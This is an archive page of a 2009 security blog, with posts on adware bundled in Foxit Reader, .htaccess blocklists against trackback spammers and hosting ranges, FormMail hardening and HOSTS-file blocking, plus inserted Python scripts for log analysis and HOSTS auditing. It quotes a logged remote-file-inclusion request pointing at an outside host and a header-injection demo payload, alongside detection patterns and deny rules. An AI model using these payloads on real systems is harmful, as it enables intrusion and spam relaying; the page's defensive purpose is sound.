For a while now, the freeware Foxit PDF reader, an alternative to the also free and much exploited Adobe Reader, has been shipping bundled with the ASK search engine toolbar. Foxit is doing this because they get paid a commission for each installation of the Toolbar, by Ask.com, which helps offset the cost of developing and updating the Foxit Reader. Ask is a search engine, formerly known as "Ask Jeeves," which has been losing its popularity over the last several years. In an effort to improve their sagging search engine ranking, they have ramped up their partnerships with various software designers who are paid to include the Ask Toolbar in their program installers. In the Foxit PDF reader installer, this toolbar is also called the "Foxit Toolbar, Powered by Ask.com." In the terms of use license that most people usually agree to without reading, the option to install this toolbar is pre-checked by default. Many users of Foxit are used to simply accepting the default options when installing or updating the Foxit software. If you do allow the toolbar to be installed, the terms of Ask Toolbar service is displayed to you, beginning with these words:

"We reserve the right to add additional features or functions to the existing Toolbar. When installed on your computer, the Toolbar periodically communicates with our servers. We may require the updating of the Toolbar ... This update may occur automatically."

The installation options warn that if you opt out of installing the "Foxit" toolbar you lose the Typewriter Tools, Text Viewer and Text Converter. This results in a lot more users allowing the Ask Toolbar to be installed than might have otherwise been the case. But, if someone wanted to remove it afterward, or disable it, there was no problem in the past.

However, as of April 2010, the Foxit installer has been altered in the way the Ask Toolbar gets installed, so that it cannot be uninstalled in a simple fashion. According to Ellen7, on a Foxit Corporation forum, when a user asked how to permanently remove the advertising and Ask Toolbar from the browser after it was installed with a recent Foxit security update, her reply was: "sorry, the current version can not remove, but will be remove in the next version." (sic). Another person on that forum was told by the forum administrator that the current version does not allow you to remove the Ask Search from Foxit, but the next version will allow that option, as well as removal of the browser toolbar and search changes that are forced by this version (Foxit Reader 3.2.1.401).

Furthermore, people have discovered that even if you uncheck the toolbar option during setup, it is still getting installed, or at least keeps trying to install itself, even when you tell Scotty to block it! Then, when they try to remove it, it remains in their browsers, including the current version of Firefox. Once installed, your default search engine is forcibly changed to Ask.com. Normal procedures to switch back to Google or Yahoo are met with resistance by the Ask Toolbar, which remains active even if you uninstall it via Control Panel, or via the Add-ons utility in IE and Firefox.

Freeware that bundles advertising and toolbars which are difficult to remove, or whose removal breaks the functionality of the program, is known in the security business as "Adware." Adware that sends home details about users' browsing history is also sometimes called "Spyware." Programs in this category are also affectionately referred to as PUPs, meaning Potentially Unwanted (or, less politely, Unpopular) Programs. Most anti-spyware programs will detect such applications and remove them from your PC during or after a scan, if you choose to let them. Some of the better known anti-spyware programs that remove Adware and PUPs include Spybot Search & Destroy, Ad-Aware, and Malwarebytes Anti-Malware (a.k.a. MBAM, which also removes most really nasty spyware, rootkits, keyloggers and fake security alerts).

Instructions for manually resetting your search preferences in Internet Explorer and Firefox are found in my extended comments. Use them if the Ask Search Toolbar has hijacked your desired search engine in your browser.

Continue reading "The Foxit PDF reader is becoming an Adware supported P.U.P." »


November 19, 2009

Block trackback spammer operating on Ubiquity Server Solutions

For the past few days I have been watching a script, or a person operating a server farm at Ubiquity Server Solutions, attempting to post spam trackbacks to my blog. I don't even allow trackbacks on my blog, for this very reason, yet this spamming idiot keeps blasting away with his script, ignoring a constant stream of 403 (Forbidden) responses. The page the spammer is trying to POST to is no longer in the blog database, having been deleted in the spring of 2006! So he is wasting his time and amusing me as I collect all the IP addresses I can add to my Exploited Servers Blocklist.

In fact, I have discovered that this blog trackback spammer is using a server farm assigned to Ubiquity Server Solutions, in Seattle, Washington, USA. Their full assigned CIDR is 64.120.4.0/22, covering IPs ranging from 64.120.4.0 through 64.120.7.255. However, to be fair to this clueless hosting service, the spammer is rotating through a group of servers with IP addresses only in the range of 64.120.5.0 - 64.120.5.255. To minimize possible collateral damage to innocent hosting customers, I am only blocking the narrow range encompassed by the CIDR 64.120.5.0/24.

UPDATE
November 20, 2009

Ubiquity Servers is now hitting MovableType blogs with trackback spam exploit attempts from a different CIDR: 174.34.144.0/23. I have updated the evidence and blocklist rules below to include this new CIDR.

The evidence:

174.34.145.115 - - [19/Nov/2009:12:59:57 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
174.34.145.117 - - [19/Nov/2009:15:16:17 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

64.120.5.197 - - [18/Nov/2009:07:07:08 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.241 - - [18/Nov/2009:07:12:57 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.246 - - [18/Nov/2009:07:32:26 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.254 - - [18/Nov/2009:07:49:48 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.236 - - [18/Nov/2009:08:22:27 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.196 - - [18/Nov/2009:08:30:16 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.225 - - [18/Nov/2009:08:49:54 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

Enough already! Notice that the spammer is only attempting to POST to two items. One is identified as blog entry number 18, which dates back to May 2006 and was deleted from my blog in early 2007. The other target of this hapless spammer is an article I wrote about "Stupid Blog Trackback Spammers" not understanding a 403 Forbidden response when they try to post trackback comments to a blog that has all trackbacks and comments disabled! There are no trackbacks or comments allowed on my blog! Spammers cannot POST anything!

I find this amusing, but others who do allow trackbacks or comments may not be so amused by this a-hole, whom I previously may have traced to Romania. If your website is hosted on an Apache web server, you can serve him a steady diet of 403 Forbidden responses by blocking his IP CIDRs and his user agent in the .htaccess file in your public web root, as demonstrated below. (The "order" and "deny from" directives are Apache 2.2 syntax; Apache 2.4 needs mod_access_compat for them, or the equivalent "Require not ip" form.)



<Files *>
# Answer 403 Forbidden to every request from the spammer's two address ranges
order deny,allow
deny from 64.120.5.0/24
deny from 174.34.144.0/23
</Files>

Options +FollowSymLinks
RewriteEngine On
RewriteOptions inherit
RewriteBase /

# Also refuse the exact user agent string the trackback tool identifies itself with
RewriteCond %{HTTP_USER_AGENT} ^tbr/0\.1\.0$
RewriteRule .* - [F]



You should first check whether any legitimate visitors to your blogs use the tbr/0.1.0 user agent. If so, don't block it. In all likelihood only spammers use that tool with that version number.

Details about the .htaccess file are found in my extended comments.

Continue reading "Block trackback spammer operating on Ubiquity Server Solutions" »


November 14, 2009

Block server exploit attacks coming from ThePlanet IP space

When it comes to hackers and cyber criminals using leased, co-located, or hijacked web servers to attack other web servers, one of the top culprits I see in my daily access logs is traceable to ThePlanet.com, based in Dallas, Texas. More server attacks originate from their IP addresses in any given week than from anywhere else. This has been the case for at least three years in a row.

When I say "server attacks" I am referring to attempts to hack a web server, or website, by sending it requests designed to exploit unpatched versions of software commonly used by website owners. Most attempts try to upload or inject a hostile file through a PHP script that is known to be exploitable. These are loosely known as PHP injection exploits; the kind shown below is more precisely a remote file inclusion (RFI) attack, where a URL is passed in a parameter that the vulnerable script then includes and executes as PHP. Of the targeted scripts, the one I see almost every day in my access logs is the Coppermine Photo Gallery. Hardly a day goes by that some script kiddie, hacker, or bot doesn't try to upload or inject hostile files to my server via Coppermine exploits, as demonstrated in the following actual log entry:


70.85.136.34 - - [12/Nov/2009:06:30:02 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

We can use DNSStuff or DomainTools to run a WHOIS lookup on that IP address...

WHOIS - 70.85.136.34
Location: United States [City: Dallas, Texas]
OrgName: ThePlanet.com Internet Services, Inc.
NetRange: 70.84.0.0 - 70.87.255.255
CIDR: 70.84.0.0/14

Definition of CIDR
In the above results, the last item is the CIDR of the entity in question. CIDR stands for "Classless Inter-Domain Routing." A CIDR block is written as a starting IP address, a forward slash and the number of leading bits that are fixed; the remaining bits cover the whole range assigned to that entity. Here, 70.84.0.0/14 fixes the first 14 bits, so it covers 2^18 = 262,144 addresses, from 70.84.0.0 through 70.87.255.255.

The CIDR covering ThePlanet.com is shown to be 70.84.0.0/14, but they have other assigned CIDRs that are used by hackers and spammers. All pertinent CIDRs that I have discovered to this date for ThePlanet.com are listed further down in this article, in "deny from" rules, which are referred to as a "blocklist." I have also thrown in IPs belonging to Everyone's Internet and Rackspace, both favorites of spammers and hackers. Any IP address that is covered by one of the CIDRs in the blocklist will get a server 403 Forbidden response, no matter what page they try to view on a website that employs these rules.

Furthermore, I have included a ".htaccess" mod_rewrite rule to block the exact user agent string "Mozilla/5.0" on its own. No real browser sends that bare string (a genuine browser's user agent continues with platform and version details), so an exact match catches scripted hacking tools without touching real visitors. Read on and learn how to protect your Apache web server, or Apache-hosted websites, from exploit attacks coming from ThePlanet and the like, or from Mozilla/5.0 hack tools.
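Both this post and the trackback-spammer post above end up doing the same job by hand: read the access log, spot the hostile requests, check which source addresses an existing blocklist already covers, and turn the rest into .htaccess rules. The following Python script is an added example that does that for both cases (it is not code from either post). It parses Apache combined-format lines, labels trackback POSTs, the tbr/0.1.0 and bare Mozilla/5.0 user agents, and RFI attempts (a URL inside a query parameter), tests source IPs against CIDR blocks with the standard ipaddress module, and emits "deny from" lines aggregated to /24 plus the exact-match RewriteCond lines. The log lines in SAMPLE_LOG are the ones quoted in the two posts; the only assumption is the /24 aggregation, which mirrors the narrow block chosen in the trackback post.

```python
"""Parse Apache access-log lines, flag trackback-spam and remote-file-inclusion
attempts, and turn the hostile sources into .htaccess rules. Added example,
not code from either post; the log lines are the ones quoted in the posts."""
import ipaddress
import re
from collections import Counter
from urllib.parse import parse_qs

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SPAM_TOOL_UAS = {"tbr/0.1.0"}       # the trackback tool seen in the first post
BARE_UAS = {"Mozilla/5.0"}          # bare string no real browser sends
TRACKBACK_PATH = re.compile(r"/mt-tb\.cgi/\d+$")
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def parse_line(line):
    """Fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec):
    """Labels for one parsed hit; an empty list means nothing suspicious."""
    labels = []
    if rec["method"] == "POST" and TRACKBACK_PATH.search(rec["path"]):
        labels.append("trackback-post")
    if rec["ua"] in SPAM_TOOL_UAS:
        labels.append("spam-tool-ua")
    if rec["ua"] in BARE_UAS:
        labels.append("bare-ua")
    # A URL in a query parameter is the signature of an RFI attempt: the
    # vulnerable script include()s whatever THEME_DIR (etc.) points to.
    _, _, query = rec["path"].partition("?")
    for key, values in parse_qs(query, keep_blank_values=True).items():
        if any(REMOTE_URL.match(v) for v in values):
            labels.append(f"rfi:{key}")
    return labels


def in_blocklist(ip, cidrs):
    """True when ip falls inside any of the CIDR blocks already denied."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(c) for c in cidrs)


def deny_rules(records, cidrs):
    """'deny from' lines, one per /24, for hostile sources not already covered."""
    nets = Counter()
    for rec in records:
        if classify(rec) and not in_blocklist(rec["ip"], cidrs):
            nets[str(ipaddress.ip_network(rec["ip"] + "/24", strict=False))] += 1
    return [f"deny from {net}" for net in sorted(nets, key=ipaddress.ip_network)]


def user_agent_rules(uas):
    """mod_rewrite lines that answer 403 to each exact user-agent string."""
    lines = ["RewriteEngine On"]
    for ua in sorted(uas):
        lines.append("RewriteCond %{HTTP_USER_AGENT} ^" + re.escape(ua) + "$")
        lines.append("RewriteRule .* - [F]")
    return lines


def analyze(log_text, cidrs):
    """(per-line labels, deny rules) for a block of log text."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    report = [(r["ip"], classify(r)) for r in records]
    return report, deny_rules(records, cidrs)


# Log lines quoted in the two posts (trackback spam, then the Coppermine RFI).
SAMPLE_LOG = """\
174.34.145.115 - - [19/Nov/2009:12:59:57 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.241 - - [18/Nov/2009:07:12:57 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.246 - - [18/Nov/2009:07:32:26 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
70.85.136.34 - - [12/Nov/2009:06:30:02 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    report, rules = analyze(SAMPLE_LOG, ["70.84.0.0/14"])   # ThePlanet already blocked
    for ip, labels in report:
        print(ip, labels)
    print("\n".join(rules + user_agent_rules(SPAM_TOOL_UAS)))
```

Run against the sample with only ThePlanet's /14 in the blocklist, the script reports the Coppermine hit as already covered and proposes deny rules for 64.120.5.0/24 and 174.34.145.0/24; with all three CIDRs from the two posts supplied, it proposes nothing new. The same loop over a real log is how you confirm that a proposed block is as narrow as the evidence allows before adding it.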

Continue reading "Block server exploit attacks coming from ThePlanet IP space" »


September 1, 2009

Hotmail POP access method changed on Sept 1, 2009

On September 1, 2009, Microsoft changed the way their Hotmail email servers communicate with POP3 - SMTP desktop email clients. As of this day you cannot send or receive Hotmail through Outlook Express, period; finito, kaput! You must change to a different desktop email client, like Windows Live Mail. Microsoft Outlook users can download and install the Microsoft Outlook Connector to continue to access Hotmail. The details about these changes and what you need to do follow.

If you use Microsoft Office Outlook to send and receive through Hotmail, you can download the free Office Outlook Connector to continue accessing your Windows Live Hotmail within Outlook 2003 or 2007. If you run an older version, read this information.

If you use Outlook Express (OE) to view Hotmail, you can choose to download the free Windows Live Mail (WLM), which resembles Outlook Express, but is much more powerful, less prone to crashes and contains a junk filter. You can import all of your saved .eml messages and accounts from OE into WLM (via Export/Import, or drag and drop between email clients). You can also import your personal folders from OE. The view is a little different, but you'll get used to it. You can find help on this page with exporting messages from Outlook Express into WLM.

If you are using Entourage to send and receive Hotmail, read these instructions to continue connecting to the new servers.

New Mail Server Names:
There are also new names for the Hotmail POP3 and SMTP mail servers. (Windows Live Mail and the Outlook Connector talk to Hotmail with Microsoft's own DeltaSync protocol rather than POP3; the names below are for clients that still use POP3 and SMTP.) The new incoming POP3 server is pop3.live.com and the new outgoing SMTP server is smtp.live.com. You must also change the incoming and outgoing ports, as outlined in my extended content under "New mail servers and ports."

Continue reading "Hotmail POP access method changed on Sept 1, 2009" »


June 10, 2009

How to use Spybot Search & Destroy to fight malware

About Spybot Search & Destroy

Spybot Search & Destroy (S&D), a product of Safer Networking Ltd., is a free ("donation-ware") security program that is used by millions of people to fight off spyware, keyloggers, Trojans, Botnet executables, adware, hostile domains, unwanted cookies and other types of malware in the wild. Being freeware it lacks some functions that are commonly implemented in commercial security programs. It has only manual updates, which are usually released once a week, on Wednesdays (see my regular weekly articles about new updates), and limited scanning presets. Most functions must be carried out manually, but hey, it's free! Despite these limitations Spybot S&D is a well respected and effective anti-malware tool to add to your arsenal.

Spybot Search and Destroy can be downloaded for free from either www.spybot.info, or from www.safer-networking.org, or several official mirror sites. Don't fall for fake versions distributed by rogue anti spyware websites. Approved download mirror sites are listed on the Spybot S&D downloads page.

Once downloaded you should install the program onto your hard drive. There are installation options to watch for, and the options you select will affect how the program behaves when launched. One of the installation options is the "TeaTimer" module. This is a realtime monitoring component that sits in your System Tray and springs into action whenever a change is about to be made to the system, the Registry, or your browser's home or search page. It pops up little balloon alerts asking whether to allow or deny the change, or notifying you that a suspicious program file was terminated automatically. These balloon popups can be annoying at times, although you can tell TeaTimer to remember your decisions. Unfortunately, there have been several serious false positives reported in the Spybot forums of the TeaTimer module deleting harmless files needed by other programs or by Windows itself. Lately these false positives are becoming fewer and further between. Whether to use the TeaTimer module is your choice. I would keep Windows System Restore turned ON so that you can roll back if TeaTimer renders an important program, or part of Windows itself, unusable; if Windows will no longer boot normally, the "Last known good configuration" startup option is the other fallback.

No matter which options you choose to install the program with, always select the option to update the program immediately. You can select or deselect all options later on, using the Advanced Mode. Once installed and updated it is time to Immunize, then scan for threats. These steps are described in my extended comments, along with download and forum links and more instructions about using Spybot Search and Destroy.

Continue reading "How to use Spybot Search & Destroy to fight malware" »


May 15, 2009

Securing FormMail scripts against spambots

Takeaway

This is a technical article about securing a Perl "FormMail" script against spammers who attempt to hijack these scripts for use as spam relays. For those not in the know, FormMail, written in the "Perl" scripting language, is one of the original mailer scripts freely available for general use on websites. It is used by millions of webmasters to send email from a web page form. However, unbeknownst to many webmasters, older versions of FormMail are totally insecure and can be exploited as spam relays.

History of FormMail

The original version of FormMail was written in 1995 by Matt Wright and was made available for free on his website: Matt's Script Archive. Unfortunately, the early versions of his FormMail script were very insecure and easily turned into spam relays. This fact was seized upon in 2002 by spammers who used bots to scour websites in search of these exploitable scripts, by name or variations thereof. In response, on April 19, 2002, Matt rewrote his FormMail script to secure it better and released it as version 1.91. This was to become the final version of Matt's FormMail. It remains mostly insecure to this day, yet is in use by website owners around the World who haven't learned about the exploits targeting FormMail.

Several years ago I wrote an in depth web article describing the vulnerabilities in Matt's FormMail, partially titled: FormMail Security Vulnerabilities and Solutions, in which I also recommended a drop-in secure replacement script known as NMS FormMail, which was developed by a group calling themselves the London Perl Mongers. My article is still a valuable resource and will bring most webmasters up to speed on what they need to do to protect their websites from FormMail exploiters. Following my recommendations will certainly help to secure any FormMail scripts you may be using. It will also protect your email account(s) from being harvested, because NMS FormMail lets the form submit an alias number for each recipient instead of a plain text address. But, there's more you can do that wasn't covered in my original article.

Securing FormMail - 101

One of my recommendations was renaming your FormMail script to something other than its default spelling: formmail.pl. While this makes it a little harder for hostile bots to locate the script, it is useless at protecting it against human spammers. All they need to do is read the source code of your contact or feedback pages to get the name of the script that processes your forms and mails comments to you. Then they can go after that script by its new name to try to exploit it for use as a spam relay. If it really is an insecure version of Matt's FormMail it will be used as a spam relay! If you are running your website on an Apache web server, as most of us are, there are special directives, called mod_rewrite directives, that can be placed in a server file named .htaccess to completely hide the name of the renamed script. If you are allowed to add these directives you can make your FormMail script invisible to spammers. Keep in mind that hiding or renaming the script only raises the cost of finding it; it does not fix the script. If the handler still lets the form choose the recipient, or still copies submitted fields into mail headers unchecked, it is a spam relay waiting to be found, so replace or patch it first and treat the hiding as a second layer.
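To make the two defects concrete, here is an added example in Python (it is not code from this article, from Matt's FormMail or from NMS FormMail): a minimal form-to-mail handler written the way early FormMail behaved, next to a hardened version that uses a server-side alias table for recipients (the NMS FormMail idea), refuses line breaks in header-bound fields, and keeps a referer allowlist only as a second layer. Nothing is sent; each builder returns the message text it would hand to sendmail. The addresses, host names and alias table are constructed for the example.

```python
import re

# Added example in Python (not code from the article, from Matt's FormMail
# or from NMS FormMail): a minimal form-to-mail handler showing the classic
# FormMail relay bug next to a hardened version. Nothing is sent; each
# builder returns the message text it would hand to sendmail. Addresses,
# host names and the alias table are constructed for this example.

# Recipients keyed by alias number, the NMS FormMail approach: the HTML
# form posts recipient=1, never a real address.
RECIPIENTS = {
    "1": "webmaster@example.com",
    "2": "sales@example.com",
}

# Referer allowlist in the style of FormMail 1.91's @referers. The header is
# supplied by the client and trivially forged, so it is a second layer only.
ALLOWED_REFERERS = ("www.example.com", "example.com")

CRLF = re.compile(r"[\r\n]")
EMAIL = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")


def build_message_insecure(form):
    """Early FormMail behaviour: the browser-supplied 'recipient' field
    becomes the To: header and other fields land in headers unchecked.
    Anyone who can POST to the script can mail anyone, and a CR/LF inside
    'email' lets them append headers such as Bcc: with a victim list."""
    return (
        f"To: {form.get('recipient', '')}\r\n"
        f"From: {form.get('email', 'nobody@example.com')}\r\n"
        f"Subject: {form.get('subject', 'Form submission')}\r\n"
        f"\r\n{form.get('comments', '')}\r\n"
    )


def build_message_hardened(form, referer=None):
    """Hardened equivalent. Raises ValueError on anything a relay abuser
    would send; the CGI wrapper should log it and answer with an error."""
    # 1. The recipient is an alias resolved server-side; unknown -> reject.
    to_addr = RECIPIENTS.get(form.get("recipient", ""))
    if to_addr is None:
        raise ValueError("unknown recipient alias")

    # 2. No field that ends up in a header may contain CR or LF.
    for field in ("email", "realname", "subject"):
        if CRLF.search(form.get(field, "")):
            raise ValueError(f"line break in header field {field!r}")

    # 3. The visitor's address must be exactly one address, not a list.
    email = form.get("email", "")
    if email and not EMAIL.fullmatch(email):
        raise ValueError("malformed email address")

    # 4. Optional referer allowlist. A missing header is tolerated because
    #    privacy tools strip it; a wrong one is rejected.
    if referer is not None:
        host = re.sub(r"^https?://", "", referer).split("/")[0].lower()
        if host not in ALLOWED_REFERERS:
            raise ValueError("unexpected referer")

    # 5. Fixed From: in our own domain; the visitor goes in Reply-To: only,
    #    so the script can never be used to forge mail as a third party.
    subject = form.get("subject", "Form submission")[:200]
    header = [f"To: {to_addr}", "From: form-handler@example.com", f"Subject: {subject}"]
    if email:
        header.append(f"Reply-To: {email}")
    return "\r\n".join(header) + "\r\n\r\n" + form.get("comments", "") + "\r\n"


if __name__ == "__main__":
    abuse = {"recipient": "victim@spam.example",
             "email": "a@b.example\r\nBcc: c@d.example, e@f.example",
             "comments": "buy now"}
    print(build_message_insecure(abuse))          # relays happily
    try:
        build_message_hardened(abuse)
    except ValueError as err:
        print("rejected:", err)                   # unknown recipient alias
```

The order of the checks matters less than the fact that the recipient never comes from the client at all: with the alias table in place, renaming or hiding the script becomes a convenience rather than the thing standing between you and a spam run.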

Read the rest of the details in my extended comments.

Continue reading "Securing FormMail scripts against spambots" »


May 1, 2009

Block Ukrainian Malware Server on Eurohost

Yesterday, April 30, 2009, when investigating a problem with an associate's websites, I traced a cross site scripting iframe exploit, pointing to a malware middleman website at tojandglow.com, which redirects victims to a hostile server hosted in the Ukraine by Eurohost LLC. This Ukrainian server is currently dispensing malicious software that includes 9 Trojans, 7 scripting exploits and 1 virus.

The hostile iframe code was injected into the home pages of two related websites by exploiting vulnerabilities in a PHP script used by the webmaster of those websites. The server dispensing the exploits is located at 91.212.65.138, which coincides with the Eurohost home page. The CIDR assigned to Eurohost is 91.212.65.0/24 and you should block access to it in your firewall's IP blocking rules. The Windows HOSTS file cannot block an IP address or an address range, only host names, so use it for the tojandglow.com domain and the firewall for the address block. Examples of how to do both are found below.

Any website running unpatched PHP or CGI scripts is in danger of becoming an inadvertent carrier of the redirection iframe that leads your innocent visitors to servers rigged to exploit vulnerabilities in their browsers, browser add-ons, plug-ins, or helper objects. Some of the most frequently exploited applications are Internet Explorer (any version prior to 8.0), Adobe Flash, Adobe Reader and Apple QuickTime. Other exploited programs include Apple Safari, Google Chrome and, occasionally, Mozilla Firefox. On rare occasions the Opera browser and the Java plug-in are vulnerable to targeted attacks. Firefox and Opera browsers are usually updated very quickly after a vulnerability is reported to their maintainers. Plug-ins usually take longer to update because they have to interact with so many other items and applications.

Webmasters and server administrators, you are responsible for keeping up to date with patches released by software authors, for any applications or scripts that you choose to run on your websites. Information to help you protect your websites and servers from getting exploited by hostile injection probes is in my extended comments.

Individuals browsing the Internet are the real targets of all of these injection attacks. This includes everybody reading this article. You and I have to constantly remain vigilant about threats to our computers' security. New exploits are found every month and are often released in the wild before software authors can respond with patched versions. Those are called zero day exploits. There are several ways to protect your computers from these exploits, including, but not limited to keeping up to date with all Windows, Mac or Linux updates and patches, and patches for commonly exploited third party browser add-ons, like Flash players, PDF Readers, Quicktime and Java plug-ins. Your next line of defense is a combination of security programs encompassing a 2-way firewall, anti-virus and anti-spyware and web threat protection that blocks hostile web pages. Or, you can install one top-notch security suite, like Trend Micro Internet Security and have all these protections and more in just one regularly updated package. There are links to reputable security products in the right sidebar on all of my blog pages.

Windows users have an additional means of protecting their PCs from visiting hostile websites. There is a special file, normally found in C:\Windows\System32\drivers\etc\, with the unusual file name: HOSTS. Although it has no file extension it can be opened and edited using the built-in Windows Notepad. Each line of the HOSTS file maps a host name to an IP address: the address comes first, then one or more spaces or tabs, then the name. Windows consults this file before asking DNS, so a name mapped to 127.0.0.1 never resolves to the real server. It only works on names; an entry whose second field is an IP address or a CIDR range does nothing, because nothing ever looks up an IP address by name. To protect your computer from being redirected to the hostile tojandglow website, open your HOSTS file and edit it using these steps.


  1. Using Start > (My) Computer, double-click on the C drive icon, then navigate to your Windows\System32\drivers\etc\ folder.

  2. Inside the "etc" folder you should see a file named "Hosts" You may have to unhide system files before this file can be seen. See my extended comments for details on how to do this.

  3. Right-click on the file named HOSTS and choose (left click) Properties

  4. Find the attributes section starting with "READ-ONLY" and uncheck it if it was checked

  5. Click Apply and OK to close the Properties window.

  6. Right-click on HOSTS while holding down the Shift key and select "Open With"

  7. Scroll through the programs list until you find "Notepad" and double-click on it

  8. If Notepad isn't listed you will have to use the browse button to navigate to the Windows folder, where Notepad.exe is located.

  9. With HOSTS open for editing go to the last line in the file and hit ENTER

  10. Add these lines, with a tab (or spaces) after each 127.0.0.1. HOSTS matching is exact, with no wildcards, so list both the bare domain and the www form. The IP address 91.212.65.138 and the range 91.212.65.0/24 cannot be blocked here and belong in your firewall rules instead:

    • 127.0.0.1       tojandglow.com

    • 127.0.0.1       www.tojandglow.com


  11. Click File > Save and in the File Type selection, choose All Files and save it as HOSTS, without an extension.

  12. Windows may decide to add a .txt extension anyway. If it does, allow this, then right-click on the saved file and delete the .txt extension. Answer the challenge about changing file extensions.


The change applies to new lookups as soon as the file is saved; run ipconfig /flushdns from a command prompt (or reboot) to clear any addresses the DNS resolver cache already holds. From that point on any script that tries to redirect you to a host name listed in the HOSTS file will instead be looped right back to your own computer, commonly referred to as 127.0.0.1, or localhost. The injected iframe would display a "page cannot be found" error if it was visible (it isn't; it's only 1x1 pixel!). If you run a web server on your own PC, map the hostile names to 0.0.0.0 instead of 127.0.0.1 so the request fails outright rather than reaching your local server. Do the same anytime a new hostile host name is published.

BTW: If you see any 127.0.0.1 entries referring to microsoft.com in your HOSTS file, remove them! Malware put them there to prevent you from getting Windows Updates or Microsoft security downloads. Ditto for any recognizable security vendors' websites.
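The two checks just described, entries that can never match because the "name" field is really an address or a range, and entries planted by malware to sinkhole update and security-vendor sites, are easy to automate. The following Python script is an added example, not part of the article: it audits a HOSTS file, separates out the addresses that belong in a firewall rule instead, and writes back a cleaned copy. The sample file and the list of protected domain suffixes are constructed for the example; extend PROTECTED_SUFFIXES with the vendors you actually rely on.

```python
import ipaddress

# Added example, not part of the article: an auditor for the Windows HOSTS
# file that catches the two mistakes discussed above, entries that can never
# match because the "host name" is really an IP address or a CIDR range, and
# entries planted by malware to sinkhole update and security-vendor sites.
# The sample file and the list of protected domains are constructed for
# this example; extend PROTECTED_SUFFIXES with the vendors you rely on.

SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1       tojandglow.com
127.0.0.1       91.212.65.138
127.0.0.1       91.212.65.0/24
127.0.0.1       www.microsoft.com
127.0.0.1       update.microsoft.com   # planted by malware
0.0.0.0         www.tojandglow.com
"""

PROTECTED_SUFFIXES = ("microsoft.com", "windowsupdate.com",
                      "safer-networking.org", "trendmicro.com", "avg.com")
SINKHOLE_TARGETS = {"127.0.0.1", "0.0.0.0", "::1"}


def is_ip_or_cidr(field):
    """True if the field parses as a bare address or a network, which a
    name lookup can never match."""
    try:
        ipaddress.ip_network(field, strict=False)
        return True
    except ValueError:
        return False


def audit_hosts(text):
    """Return (line number, kind, value) tuples for every problem found."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        fields = line.split()
        target, names = fields[0], fields[1:]
        try:
            ipaddress.ip_address(target)
        except ValueError:
            findings.append((lineno, "bad_target", target))
            continue
        if not names:
            findings.append((lineno, "no_hostname", target))
            continue
        for name in names:
            if is_ip_or_cidr(name):
                findings.append((lineno, "ip_in_hostname_field", name))
            elif target in SINKHOLE_TARGETS and any(
                    name == s or name.endswith("." + s) for s in PROTECTED_SUFFIXES):
                findings.append((lineno, "poisoned_entry", name))
    return findings


def firewall_targets(findings):
    """Addresses and ranges that were wrongly put in HOSTS belong in a
    firewall block rule instead; return them normalised to CIDR."""
    return sorted({str(ipaddress.ip_network(v, strict=False))
                   for _, kind, v in findings if kind == "ip_in_hostname_field"})


def clean_hosts(text):
    """The file with every flagged line removed; comments and good entries
    are kept verbatim so the result can be written straight back."""
    bad = {lineno for lineno, _, _ in audit_hosts(text)}
    kept = [raw for lineno, raw in enumerate(text.splitlines(), 1) if lineno not in bad]
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    for lineno, kind, value in audit_hosts(SAMPLE_HOSTS):
        print(f"line {lineno}: {kind}: {value}")
    print("block in firewall:", firewall_targets(audit_hosts(SAMPLE_HOSTS)))
```

Run it against a copy of drivers\etc\hosts before writing anything back; the poisoned-entry check is a suffix match, so it flags any sub-domain of a protected name that points at loopback, which is exactly what the malware described above does.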

Continue reading "Block Ukrainian Malware Server on Eurohost" »


March 3, 2009

Opera Browser 9.64 update hosed my html associations

